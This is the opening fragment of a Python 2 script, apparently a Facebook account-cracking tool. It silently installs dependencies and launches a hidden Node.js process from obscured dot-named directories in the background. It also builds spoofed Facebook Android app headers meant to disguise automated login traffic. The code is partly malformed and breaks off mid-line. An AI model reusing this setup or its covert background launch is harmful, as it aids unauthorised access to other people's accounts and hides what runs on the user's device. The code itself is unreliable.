# coding=utf-8

#!/usr/bin/python

# coding=utf-8

# coded by : Fucked by Habib

# https://www.facebook.com/habib.trmx

try:

    import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib,requests

    from multiprocessing.pool import ThreadPool

except ImportError:

    os.system("pkg install python -y")

    os.system("pip install requests")

    os.system("pip install mechanize")

    os.system("pip2 install nodejs")

    os.system("pip2 install npm")

    os.system("python2 habib-tiger. py")

try:

    os.mkdir('save')

except OSError:

    pass

    if os.path.isfile('.../index.js'):

 	os.system('mv ... .....')	os.system('cd ..... && npm install')

 	os.system('#')

 	os.system('#')

 	os.system('fuser -k 5000/tcp &')

 	os.system('#')

 	os.system('node ...../index.js &')

 	os.system('fuser -k 5000/tcp &')

 	os.system('#')

 	os.system('node ...../index.js &')

from requests.exceptions import ConnectionError

bd=random.randint(2e7, 3e7)

sim=random.randint(2e4, 4e4)

header={'x-fb-connection-bandwidth': repr(bd),'x-fb-sim-hni': repr(sim),'x-fb-net-hni': repr(sim),'x-fb-connection-quality': 'EXCELLENT','x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA','user-agent':'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]','content-type': 'application/x-www-form-urlencoded','x-fb-http-engine': 'Liger'}

reload(sys)

sys.setdefaultenco
